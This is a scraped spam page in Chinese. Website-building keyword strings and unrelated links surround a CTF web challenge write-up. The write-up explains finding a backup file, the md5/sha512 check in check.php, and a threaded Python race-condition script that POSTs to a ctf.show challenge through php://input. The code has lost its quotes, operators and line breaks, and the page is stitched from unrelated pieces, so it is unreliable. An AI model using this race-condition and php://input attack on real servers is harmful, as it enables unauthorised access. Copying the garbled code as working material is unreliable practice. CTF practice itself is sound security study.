当前位置: 首页 > news >正文

西安的网站制作公司查询公司水利平台网站

西安的网站制作公司,查询公司水利平台网站,成都装饰网站建设,给个免费的网址0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 首先跑一下字典#xff0c;这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份#xff0c;备份的是check.php.bak 然后接着看#xff0c;可以看到这里不太可能是sql注入#xff0c;有…0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 首先跑一下字典这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份备份的是check.php.bak 然后接着看可以看到这里不太可能是sql注入有一个请求 check.php?tokentokenphp://input 正好接着上一个文件备份的内容看一下源码 首先token是将date(i)进行md5然后就是文件md5对比要求md5一致但是sha512不一样这里比较的文件是key.dat 直接访问进行下载即可。 原理就是将上传的文件保存为flag.dat,然后进行对比那么这种情况肯定会出现条件竞争也就是说flag.dat在比较完第一次之后被覆盖了的话就可以满足第二个条件 import requests import time import hashlib import threadingistr(time.localtime().tm_min) mhashlib.md5(i.encode()).hexdigest()def go_to(data):try:urlfhttp://1babff5a-576a-48b8-9f50-d4feeb5b7cbd.challenge.ctf.show/check.php?token{m}php://inputsrequests.post(url,datadata)print(s.text)except Exception as e:passwith open(key.dat,rb) as t:data1t.read()pass for i in range(20):threading.Thread(targetgo_to,args(data1,)).start() for i in range(20):data2abbcdthreading.Thread(targetgo_to,args(data2,)).start()以上
http://www.pierceye.com/news/530528/

相关文章:

  • 做网站手机验证收费吗百度竞价推广是什么工作
  • 电商网站 案例熊掌号怎么域名做网站
  • 做网站怎么改关键词安卓开发软件工具
  • 做SEO公司多给网站wordpress 固定链接 无法访问
  • 潍坊百度网站优化网站建设相关文章
  • 做学术研究的网站怎样建设个人游戏网站
  • dede淘宝客网站网站页面优化简单吗
  • 长春做网站优化的公司赣州做网站公司哪家好
  • 网站开发宝典做网站属于软件开发吗
  • 网站建设要求 优帮云福州模板建站定制网站
  • wordpress本地更换为网站域名jsp网站开发书籍
  • 做一个网站的流程沧州网站建设
  • 山东省城乡住房建设厅网站住房建设部网站监理员
  • 怎么做百度网站验证保健品商城网站模板
  • 丹东市做网站广东做网站的公司
  • 网站收录大全销售推广
  • 网站发展历程东莞企业网站建设制作
  • 厦门市建设局查询保障摇号网站首页做房产网站长
  • 公司网站建设的普遍性长沙建站网
  • 东莞英文建站公司api模式网站开发
  • 参与网站网站建设可判几年大同住房和城乡建设网站
  • 住房和城乡建设部网站投诉电话哈尔滨网页设计网站模板
  • 西安网站制作哪家公司好阳江房产网最新楼盘江楼盘
  • 科技馆网站建设网络营销实务教案
  • 网站上线倒计时html5模板文创产品设计流程
  • 建设项目竣工环保验收公示网站网站建设具体实施方案
  • 蜜淘app在那个网站做的濮阳吧
  • 建网站市场哪家网站开发好
  • 找生产厂家的网站宁波seo运营推广平台排名
  • 淘宝的网站建设的目标昌大建设集团是哪里的